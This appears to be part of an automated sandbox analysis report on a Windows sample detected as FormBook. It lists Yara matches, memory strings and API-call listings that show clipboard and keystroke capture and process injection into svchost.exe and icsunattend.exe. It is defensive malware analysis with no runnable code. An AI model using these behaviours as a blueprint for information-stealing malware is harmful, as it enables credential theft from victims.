                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
                Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00B06B0C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00B06D07
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B06B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_00B06B0C
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_00AF2B37
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B1F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00B1F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: This is a third-party compiled AutoIt script.2_2_00AB3D19
                Source: VSP469620.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: VSP469620.exe, 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_db87d10b-b
                Source: VSP469620.exe, 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0e85a2fe-8
                Source: VSP469620.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_91ad297e-1
                Source: VSP469620.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5a5057dd-9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006FC8E3 NtClose,4_2_006FC8E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272B60 NtClose,LdrInitializeThunk,4_2_03272B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03272DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03272C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032735C0 NtCreateMutant,LdrInitializeThunk,4_2_032735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03274340 NtSetContextThread,4_2_03274340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03274650 NtSuspendThread,4_2_03274650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272BA0 NtEnumerateValueKey,4_2_03272BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272B80 NtQueryInformationFile,4_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272BE0 NtQueryValueKey,4_2_03272BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272BF0 NtAllocateVirtualMemory,4_2_03272BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272AB0 NtWaitForSingleObject,4_2_03272AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272AF0 NtWriteFile,4_2_03272AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272AD0 NtReadFile,4_2_03272AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272F30 NtCreateSection,4_2_03272F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272F60 NtCreateProcessEx,4_2_03272F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272FA0 NtQuerySection,4_2_03272FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272FB0 NtResumeThread,4_2_03272FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272F90 NtProtectVirtualMemory,4_2_03272F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272FE0 NtCreateFile,4_2_03272FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272E30 NtWriteVirtualMemory,4_2_03272E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272EA0 NtAdjustPrivilegesToken,4_2_03272EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272E80 NtReadVirtualMemory,4_2_03272E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272EE0 NtQueueApcThread,4_2_03272EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272D30 NtUnmapViewOfSection,4_2_03272D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272D00 NtSetInformationFile,4_2_03272D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272D10 NtMapViewOfSection,4_2_03272D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272DB0 NtEnumerateKey,4_2_03272DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272DD0 NtDelayExecution,4_2_03272DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272C00 NtQueryInformationProcess,4_2_03272C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272C60 NtCreateKey,4_2_03272C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272CA0 NtQueryInformationToken,4_2_03272CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272CF0 NtOpenProcess,4_2_03272CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272CC0 NtQueryVirtualMemory,4_2_03272CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03273010 NtOpenDirectoryObject,4_2_03273010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03273090 NtSetValueKey,4_2_03273090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032739B0 NtGetContextThread,4_2_032739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03273D10 NtOpenProcessToken,4_2_03273D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03273D70 NtOpenThread,4_2_03273D70
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04584650 NtSuspendThread,LdrInitializeThunk,7_2_04584650
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04584340 NtSetContextThread,LdrInitializeThunk,7_2_04584340
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04582C70
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582C60 NtCreateKey,LdrInitializeThunk,7_2_04582C60
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04582CA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04582D10
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04582D30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582DD0 NtDelayExecution,LdrInitializeThunk,7_2_04582DD0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04582DF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04582EE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04582E80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582F30 NtCreateSection,LdrInitializeThunk,7_2_04582F30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582FE0 NtCreateFile,LdrInitializeThunk,7_2_04582FE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582FB0 NtResumeThread,LdrInitializeThunk,7_2_04582FB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582AD0 NtReadFile,LdrInitializeThunk,7_2_04582AD0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582AF0 NtWriteFile,LdrInitializeThunk,7_2_04582AF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582B60 NtClose,LdrInitializeThunk,7_2_04582B60
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04582BF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04582BE0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04582BA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045835C0 NtCreateMutant,LdrInitializeThunk,7_2_045835C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_045839B0 NtGetContextThread,LdrInitializeThunk,7_2_045839B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582C00 NtQueryInformationProcess,7_2_04582C00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582CC0 NtQueryVirtualMemory,7_2_04582CC0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582CF0 NtOpenProcess,7_2_04582CF0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582D00 NtSetInformationFile,7_2_04582D00
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582DB0 NtEnumerateKey,7_2_04582DB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582E30 NtWriteVirtualMemory,7_2_04582E30
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582EA0 NtAdjustPrivilegesToken,7_2_04582EA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582F60 NtCreateProcessEx,7_2_04582F60
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582F90 NtProtectVirtualMemory,7_2_04582F90
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582FA0 NtQuerySection,7_2_04582FA0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582AB0 NtWaitForSingleObject,7_2_04582AB0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04582B80 NtQueryInformationFile,7_2_04582B80
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04583010 NtOpenDirectoryObject,7_2_04583010
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04583090 NtSetValueKey,7_2_04583090
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04583D70 NtOpenThread,7_2_04583D70
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_04583D10 NtOpenProcessToken,7_2_04583D10
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_00379350 NtCreateFile,7_2_00379350
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003794C0 NtReadFile,7_2_003794C0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003795B0 NtDeleteFile,7_2_003795B0
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_00379650 NtClose,7_2_00379650
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_003797B0 NtAllocateVirtualMemory,7_2_003797B0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF6685: CreateFileW,DeviceIoControl,CloseHandle,2_2_00AF6685
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AEAF64 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,2_2_00AEAF64
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00AF79D3
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ADB0432_2_00ADB043
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AC32002_2_00AC3200
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AC3B702_2_00AC3B70
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE410F2_2_00AE410F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD02A42_2_00AD02A4
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ABE3B02_2_00ABE3B0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE038E2_2_00AE038E
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD06D92_2_00AD06D9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE467F2_2_00AE467F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B1AACE2_2_00B1AACE
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE4BEF2_2_00AE4BEF
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ADCCC12_2_00ADCCC1
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB6F072_2_00AB6F07
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ABAF502_2_00ABAF50
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B131BC2_2_00B131BC
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ADD1B92_2_00ADD1B9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACB11F2_2_00ACB11F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD123A2_2_00AD123A
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE724D2_2_00AE724D
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB93F02_2_00AB93F0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF13CA2_2_00AF13CA
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACF5632_2_00ACF563
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFB6CC2_2_00AFB6CC
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB96C02_2_00AB96C0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB77B02_2_00AB77B0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B1F7FF2_2_00B1F7FF
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AE79C92_2_00AE79C9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACFA572_2_00ACFA57
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB9B602_2_00AB9B60
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AD9ED02_2_00AD9ED0
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00ACFE6F2_2_00ACFE6F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AB7FA32_2_00AB7FA3
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00E887E02_2_00E887E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E87934_2_006E8793
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D11F04_2_006D11F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E01B34_2_006E01B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E69954_2_006E6995
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006E69934_2_006E6993
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DE1934_2_006DE193
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DE2E34_2_006DE2E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DE2D84_2_006DE2D8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D2AD04_2_006D2AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D26B04_2_006D26B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006FEF434_2_006FEF43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006D2FE04_2_006D2FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DFF8C4_2_006DFF8C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_006DFF934_2_006DFF93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FA3524_2_032FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E3F04_2_0324E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033003E64_2_033003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E02744_2_032E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C02C04_2_032C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032301004_2_03230100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA1184_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C81584_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F41A24_2_032F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033001AA4_2_033001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F81CC4_2_032F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D20004_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032407704_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032647504_2_03264750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323C7C04_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325C6E04_2_0325C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032405354_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033005914_2_03300591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E44204_2_032E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F24464_2_032F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EE4F64_2_032EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FAB404_2_032FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F6BD74_2_032F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323EA804_2_0323EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032569624_2_03256962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032429A04_2_032429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0330A9A64_2_0330A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324A8404_2_0324A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032428404_2_03242840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032268B84_2_032268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E8F04_2_0326E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03282F284_2_03282F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03260F304_2_03260F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E2F304_2_032E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B4F404_2_032B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BEFA04_2_032BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324CFE04_2_0324CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232FC84_2_03232FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FEE264_2_032FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240E594_2_03240E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03252E904_2_03252E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FCE934_2_032FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FEEDB4_2_032FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324AD004_2_0324AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DCD1F4_2_032DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03258DBF4_2_03258DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323ADE04_2_0323ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240C004_2_03240C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E0CB54_2_032E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230CF24_2_03230CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F132D4_2_032F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322D34C4_2_0322D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0328739A4_2_0328739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032452A04_2_032452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E12ED4_2_032E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325B2C04_2_0325B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0327516C4_2_0327516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322F1724_2_0322F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0330B16B4_2_0330B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324B1B04_2_0324B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F70E94_2_032F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF0E04_2_032FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EF0CC4_2_032EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032470C04_2_032470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF7B04_2_032FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032317EC4_2_032317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032856304_2_03285630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F16CC4_2_032F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F75714_2_032F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DD5B04_2_032DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033095C34_2_033095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FF43F4_2_032FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032314604_2_03231460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032FFB764_2_032FFB76
